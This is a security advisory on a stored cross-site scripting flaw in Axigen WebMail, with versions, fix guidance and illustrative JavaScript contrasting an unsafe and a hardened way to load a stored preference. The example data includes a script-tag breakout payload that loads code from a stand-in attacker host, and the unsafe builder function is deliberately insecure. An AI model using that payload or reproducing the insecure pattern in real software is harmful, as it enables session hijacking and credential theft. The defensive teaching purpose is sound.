Axigen WebMail Stored XSS Vulnerability (CVE-2025-68643)

Key Information

Vulnerability Type: Cross-Site Scripting (XSS), stored

Affected Component: Axigen WebMail

Affected Versions:
- Axigen 10.3.x, 10.4.x, and 10.5.x up to 10.5.56 (fixed in 10.5.57)
- Axigen 10.6.x up to 10.6.25 (fixed in 10.6.26)

Prerequisites: The attacker must first be able to modify the account preference, either by exploiting a separate vulnerability or by using compromised credentials. This is a multi-stage attack; the XSS alone is not remotely exploitable by an unauthenticated attacker.

Description:
- The account preference parameter is not sanitized by Axigen WebMail when it is loaded from storage, so a value written there is trusted as-is when the WebMail page is built.
- The attack proceeds in two stages:
  1. Initial compromise: the attacker sets the account preference to a malicious payload (via the separate vulnerability or the compromised credentials).
  2. Payload execution: when WebMail loads the stored preference, the injected payload can redirect resource loading to an attacker-controlled server, which lets the attacker execute arbitrary JavaScript in the victim's WebMail session.

Impact: Credential theft, session hijacking, and data exfiltration from the affected account.

Solution: Update to Axigen 10.5.57 (for 10.3.x, 10.4.x and 10.5.x installations) or 10.6.26 (for 10.6.x installations) from WebAdmin. Because the payload is stored and is only neutralized by the sanitization in the fixed versions, also review accounts for unexpected preference values and treat any account whose preference was modified without the owner's knowledge as compromised (rotate its credentials and invalidate its sessions).
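The following is an added illustration of the vulnerability class described above, not Axigen's code: a stored preference that controls where WebMail loads a resource from is used verbatim in one function and validated plus escaped in the other. The preference name (resourceBase), the tag being built, the allowlist and the sample payloads are all assumptions for the example.

```javascript
// Added example (not Axigen's code). prefs.resourceBase is a hypothetical stored
// account preference that decides where a client-side resource is loaded from.

// Vulnerable pattern: the stored preference is concatenated into markup as-is.
// A value such as "https://attacker.example" redirects resource loading to the
// attacker's host, whose script then runs in the victim's session.
function buildResourceTagUnsafe(prefs) {
  return `<script src="${prefs.resourceBase}/app.js"></script>`;
}

// Minimal HTML attribute/text escaping for output encoding.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened pattern: treat the stored value as untrusted on load. Accept only a
// same-origin relative path (no scheme, no host, no quotes), fall back to a
// known-good default otherwise, and still escape on output.
const DEFAULT_RESOURCE_BASE = '/static';
const ALLOWED_RESOURCE_BASE = /^\/[A-Za-z0-9_\-\/]*$/;

function sanitizeResourceBase(value) {
  if (typeof value !== 'string') return DEFAULT_RESOURCE_BASE;
  if (!ALLOWED_RESOURCE_BASE.test(value)) return DEFAULT_RESOURCE_BASE;
  // "//host/path" passes the character allowlist but is protocol-relative,
  // i.e. it would load from another origin.
  if (value.startsWith('//')) return DEFAULT_RESOURCE_BASE;
  const trimmed = value.replace(/\/+$/, '');
  return trimmed === '' ? DEFAULT_RESOURCE_BASE : trimmed;
}

function buildResourceTagSafe(prefs) {
  const base = sanitizeResourceBase(prefs.resourceBase);
  return `<script src="${escapeHtml(base)}/app.js"></script>`;
}

// Constructed sample preferences (not real Axigen data).
const benignPrefs = { resourceBase: '/static/themes/default' };
const hostilePrefs = { resourceBase: 'https://attacker.example' };
const breakoutPrefs = {
  resourceBase: '"></script><script src="https://attacker.example/x.js"></script><script x="',
};

function demo() {
  return {
    unsafeHostile: buildResourceTagUnsafe(hostilePrefs),     // loads from attacker host
    unsafeBreakout: buildResourceTagUnsafe(breakoutPrefs),   // injects a second script tag
    safeHostile: buildResourceTagSafe(hostilePrefs),         // falls back to /static
    safeBreakout: buildResourceTagSafe(breakoutPrefs),       // falls back to /static
    safeBenign: buildResourceTagSafe(benignPrefs),           // allowed path preserved
  };
}
```

The point of the hardened version is that validation happens when the preference is read from storage, not only when it is written: a value that reached storage through another bug or a stolen password is still rejected before it influences resource loading.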